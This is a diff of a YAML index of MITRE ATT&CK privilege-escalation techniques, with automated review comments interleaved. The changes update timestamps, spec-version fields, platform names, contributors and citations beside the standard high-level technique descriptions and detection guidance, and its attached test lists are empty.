name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
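Review bot: T1574.013 loses both spec_version and x_mitre_attack_spec_version: 2.1.0 here, and nothing in the visible hunk re-adds an attack spec version for it, whereas the neighbouring techniques end up with x_mitre_attack_spec_version: 3.2.0 after object_marking_refs. If the generator emits the field at a position outside this hunk, fine; otherwise T1574.013 becomes the one technique in this section with no attack spec version at all, and either the field should be added or the omission explained.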
@@ -20693,9 +21005,8 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1574:
@@ -20762,7 +21073,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -20836,11 +21146,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -20857,7 +21166,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -20867,7 +21175,7 @@ privilege-escalation:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -20876,19 +21184,17 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -20936,11 +21242,12 @@ privilege-escalation:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -21008,23 +21315,22 @@ privilege-escalation:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1068:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-04-07T17:13:54.168Z'
name: Exploitation for Privilege Escalation
description: |-
Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
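Review bot: the Leitch Hollowing reference now points at https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf, a third-party re-host of the paper rather than the author's own site. Re-hosted PDFs disappear as easily as the original did; a web.archive.org snapshot (the approach used for the bencane entry later in this diff) would be the more durable citation, and the URL change should come with a check that the mirrored file is the same document as the one originally cited. Also note the T1068 modified timestamp moving from 2023-10-31 back to 2023-04-07 at the end of the hunk.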
@@ -21087,11 +21393,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
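Review bot: T1068 keeps x_mitre_attack_spec_version: 3.1.0 in the unchanged context while every other technique in this section is bumped to 3.2.0, and its modified timestamp regressed in the previous hunk. Both are consistent with this object having been pulled from an older snapshot than the rest; confirm the source before merging rather than shipping a mixed-version index.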
@@ -21144,8 +21449,8 @@ privilege-escalation:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -21193,78 +21498,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
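Review bot: this hunk removes the whole T1546.004 reference list (thirteen entries) together with its contributors, platforms and identity fields, which the hunks further down re-add in a new key order. The re-added list visible at the end of this diff stops at code_persistence_zsh, so intezer-kaiji-malware (Paul Litvak, Kaiji) and ESF_filemonitor (Patrick Wardle) are removed here without their re-insertion being visible; check that both survive, since the detection text still cites ESF_filemonitor.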
@@ -21312,6 +21550,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -21322,9 +21564,13 @@ privilege-escalation:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
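Review bot: x_mitre_modified_by_ref is removed from T1546.004 here and, unlike the T1078 case earlier in this diff, no visible hunk re-adds it. If the generator now emits it after object_marking_refs, beyond the end of the last hunk shown, that is fine; otherwise this object ends up without a field every other technique carries.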
@@ -21333,8 +21579,67 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1134.005:
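Review bot: `spec_version: '2.1'` is dropped in this hunk (and from every other technique object in the patch) while the object keeps its STIX 2.1 shape (`type`, `id`, `created`, `revoked`, `object_marking_refs` are all added here); spec_version is a required common property on STIX 2.1 domain objects, so anything validating these entries against the STIX 2.1 schema will now reject them. If the generator deliberately omits it, say so in the commit message; otherwise keep the field. The rest of the hunk is consistent: `x_mitre_attack_spec_version` goes 2.1.0 to 3.2.0 while `x_mitre_version` stays at '2.1' (a schema bump, not a content revision), and the `x_mitre_modified_by_ref` removed in the previous hunk is re-added at the end of this one, so nothing is lost.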
@@ -21380,7 +21685,7 @@ privilege-escalation:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -21405,13 +21710,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
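Review bot: after this hunk T1134.005 has no `x_mitre_attack_spec_version` at all (both the 2.1.0 line and `spec_version` go, with nothing added), whereas neighbouring objects either keep 2.1.0 or are bumped to 3.2.0, and its `modified` timestamp moves backwards from 2022-04-25 to 2021-02-09 (T1548.004 in the same hunk also goes back, 2022-11-08 to 2022-10-19). The backwards `modified` together with the missing spec version suggests these objects were rebuilt from an older revision of the upstream STIX data; please confirm the source bundle before merging. Note that the old values all share the `14:00:00.188Z` pattern, so if those were placeholder stamps and the new ones are the genuine upstream timestamps, the backwards move is correct and only the missing spec version needs fixing. The same pattern recurs below for T1037.003 (back to 2020-03-24), T1055.009 (2020-06-20), T1055.005 (2021-10-18), T1055.008 (2021-10-18) and T1037.001 (2020-03-24), each also losing both version fields with no replacement.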
@@ -21491,7 +21794,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.002:
technique:
@@ -21527,7 +21829,7 @@ privilege-escalation:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -21550,12 +21852,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -21633,12 +21934,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -21699,7 +21999,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -21743,7 +22042,7 @@ privilege-escalation:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -21765,7 +22064,6 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -21846,7 +22144,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -21869,7 +22166,7 @@ privilege-escalation:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -21899,12 +22196,10 @@ privilege-escalation:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -21989,7 +22284,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -22054,7 +22348,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1543.001:
@@ -22129,7 +22422,7 @@ privilege-escalation:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -22157,7 +22450,6 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1055.009:
@@ -22188,7 +22480,7 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22231,12 +22523,10 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -22253,7 +22543,7 @@ privilege-escalation:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
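Review bot: the contributor rename to `- Rodchenko Aleksandr` flips to surname-first, which is inconsistent with every other contributor entry in this file (given name first, e.g. `- Brandon Dalton @PartyD0lphin` two lines above). Unless the upstream ATT&CK record uses exactly this form, keep `Alexander Rodchenko` or copy the upstream string verbatim so the entry can be matched against it later.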
@@ -22312,7 +22602,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -22394,12 +22683,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -22496,7 +22784,6 @@ privilege-escalation:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1543.002:
technique:
@@ -22610,7 +22897,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1547.013:
@@ -22680,7 +22966,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.005:
technique:
@@ -22708,7 +22993,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -22752,8 +23037,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.007:
technique:
@@ -22789,7 +23072,7 @@ privilege-escalation:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
